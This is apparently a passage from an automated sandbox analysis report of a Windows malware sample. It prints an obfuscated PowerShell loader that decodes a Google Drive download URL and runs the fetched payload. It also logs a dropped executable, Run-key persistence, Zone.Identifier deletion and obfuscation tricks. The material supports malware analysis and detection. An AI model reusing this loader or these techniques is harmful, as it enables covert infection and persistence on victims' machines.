epowdBe,tsy.icla.Daa,esNringpUnexplOperci scat.ornb( drud$ ApolDGiftioObjekuDenatsT,efoePhr.tr UnoxsIndkr)Vel.o ');$unshady=$Fdrenehjem[0];Saprophagan (Pisseskn 'Nupti$De,meg .krol TakkoAl.opb Spe.aGelatlvarpn:SprreBunfelaEfteraSkoledPetrorunderuUndlitWor heSkakbnMicro=cilioN TraceNonf,wU hen-TradiO SalibInscrjA tikeU insc HeadtResta .gtesSBlo,kyUdlndsNonsutFjor.e.aukam Radi.,ysteNIlluveKupeettinkr.StatiWHjlpeeSnarebP.radCUr allHangoiHexace,phemn C litPensi ');Saprophagan (Pisseskn 'philo$triumB Bun a Unp.aSubagdFo,kerDah iu.ridntSengeeSkruenSched. B.rgHAnchye DuraarangsdPrivael	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Enchodontoid = 1;$Multinervate='Substrin';$Multinervate+='g';Function Pisseskn($Parate){$Nongelatinizing=$Parate.Length-$Enchodontoid;For($Agrestical=5; $Agrestical -lt $Nongelatinizing; $Agrestical+=(6)){$Dextranase88+=$Parate.$Multinervate.Invoke($Agrestical, $Enchodontoid);}$Dextranase88;}function Saprophagan($Factories){. ($Laurikke) ($Factories);}$Hovedvrker=Pisseskn 'addleMS,steo .andzConfoi Vejrl ReavlPrintaB.une/Ca,ro5.icit.Choos0Skide Lnnin(DuellW desiiMonopnWap.kdSavanoIslanwdoercs Emer BromNUoverTAxopo Opri.1Allia0Forel.Vaing0 comb;Angre DecorWGraeni Femin G.in6Kursu4Ect,c;ko tr Parenxtyede6Tri,h4taffe;Phary Elle,r,uresv Kipe:,eseg1Hjemm2Hjlpe1klogt. igne0Prd k) Hove AlterGDis aeJonnhcStrafkF,rudoPseud/ St,w2R vhu0Digi.1,ecir0Fersk0nakke1K.ass0 Mese1 ield OsphrFKlon.iFemaarKlebieBrontf S.tyoAmtsrxBorte/ Fron1Excla2Butto1 Publ.Svesk0Handl ';$Nuanceret=Pisseskn ' SdelURepansMedhoeHe.lirPar a-El,vaAUkasegPoca,eMagtkn divvtIodat ';$unshady=Pisseskn 'Xylo.h RabbtHalfhtmika,pt,lles Ayyu: Un,o/ Inka/D.kkedBo edrDicari BeravPl,caeCo.pa.Dem bg HusnoVelbeoBann,gAnno,lTandsedegne. Swinc Fel,oRebanmDemou/EndkkuDieumcAd oc?Dag oeS,rtlx sadapBhaktonond r UdtrtG imr=TobacdDefraocl.ngwVkke nWeakalFulfioPlatoaFo.stdStorb&KlbesiPessudBatte=Stv r1OneraTSpermE,elveIMesmen re.tJSkoleuFidg.NStopne ,rstahimmeiAbiol- TaleSContrRBes.iIBarbo4 UndeC emibSuppl4Freed0 DagdUTartr9Aeropk.elefrUdsy,lExecu2TraveXCoemp7AntirxHypoej MbelD,imelg reenG.orsc ';$Dousers=Pisseskn 'T llb>Reimm ';$Laurikke=Pisseskn 'AfpluigrligeDemorxLuckf ';$Flyvestolene = Pisseskn ' UnwoeKil.bcvibrihOpsplo.ibbe mic,o%daiquaHeroepGoldepUd,krdSteelatum.dtOustia A,ch%Brsli\ PorcM ShifeSinopr TykeoMythogSkorsaSkat sGastrt TrihrIntrau Pu.sl.iuntaCentr.DigamB autoeGrammsHouse Pid.l&Grumo&Und p Delfe Sst.cp,rtuhPigmeoFrt s Toppl$Objec ';Saprophagan (Pisseskn ' Punk$ Di ogSa valSlagbo S bubUnscaa fluelMisl.:OmbytAL.mbasQuee sIdioteUlempv JoureTimbrrNaadia.usiktNong.iOrgannIndbrg onti=U,ear(F attcVelsemStevedNe hu Eks m/OmskrcLetfr ota$ VentFKern.lSciopy .igtv ReleeS,less Snakt TradoU.bell FireecoelonTot.ee malt)Afspn ');Saprophagan (Pisseskn 'junke$ nsig AppalunderoepipabIsraea Lit.lpresu:ParitFGavend SyfirGra.ue vendnNonpreResidh ChanjHardme Bedrm Stil= Chil$ armu SponnPa.klsBagflh.edbia epowdBe,tsy.icla.Daa,esNringpUnexplOperci scat.ornb( drud$ ApolDGiftioObjekuDenatsT,efoePhr.tr UnoxsIndkr)Vel.o ');$unshady=$Fdrenehjem[0];Saprophagan (Pisseskn 'Nupti$De,meg .krol TakkoAl.opb Spe.aGelatlvarpn:SprreBunfelaEfteraSkoledPetrorunderuUndlitWor heSkakbnMicro=cilioN TraceNonf,wU hen-TradiO SalibInscrjA tikeU insc HeadtResta .gtesSBlo,kyUdlndsNonsutFjor.e.aukam Radi.,ysteNIlluveKupeettinkr.StatiWHjlpeeSnarebP.radCUr allHangoiHexace,phemn C litPensi ');Saprophagan (Pisseskn 'philo$triumB Bun a Unp.aSubagdFo,kerDah iu.ridntSengeeSkruenSched. B.rgHAnchye DuraarangsdPrivael	Jump to behavior

Binary contains a suspicious time stamp

Source: newfile.exe.10.dr

Static PE information: 0x853858FE [Sun Oct 28 18:42:06 2040 UTC]

PE file contains sections with non-standard names

Source: newfile.exe.10.dr

Static PE information: section name: .didat

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD348900BD pushad ; iretd	2_2_00007FFD348900C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD34897967 push ebx; retf	2_2_00007FFD3489796A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD348909A2 push E85E535Dh; ret	2_2_00007FFD348909F9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_04F645F7 push ss; retn 0007h	5_2_04F64602
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_04F64529 push es; retn 0007h	5_2_04F64552
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_04F66998 push eax; retn 0007h	5_2_04F669A1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_07DD0638 push eax; mov dword ptr [esp], ecx	5_2_07DD0AC4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_07DD0AB8 push eax; mov dword ptr [esp], ecx	5_2_07DD0AC4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_07DDE8C0 pushfd ; ret	5_2_07DDEDA3
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_09650D13 push edx; iretd	5_2_09650D14
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_09651CF8 pushfd ; ret	5_2_09651CF9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_0965134D pushfd ; iretd	5_2_0965135A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_09650E72 pushfd ; retf	5_2_09650E89
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_09654AE0 push ds; retf	5_2_09654B10
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_09650EF9 push cs; retf	5_2_09650F0A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_09650AA1 push ecx; ret	5_2_09650AA3
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_04061CF8 pushfd ; ret	10_2_04061CF9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_04060D13 push edx; iretd	10_2_04060D14
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_04060E72 pushfd ; retf	10_2_04060E89
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_04060AA1 push ecx; ret	10_2_04060AA3
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_04064AE0 push ds; retf	10_2_04064B10
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_04060EF9 push cs; retf	10_2_04060F0A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_0406134D pushfd ; iretd	10_2_0406135A
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Code function: 12_2_003813F8 pushfd ; retf	12_2_003813F9
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Code function: 12_2_0038376D push ecx; ret	12_2_00383780

Drops PE files

Source: C:\Program Files (x86)\Windows Mail\wab.exe

File created: C:\Users\user\AppData\Roaming\newfile\newfile.exe

Jump to dropped file

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run newfile			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run newfile			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

File opened: C:\Users\user\AppData\Roaming\newfile\newfile.exe:Zone.Identifier read attributes | delete

Jump to behavior

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes			Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
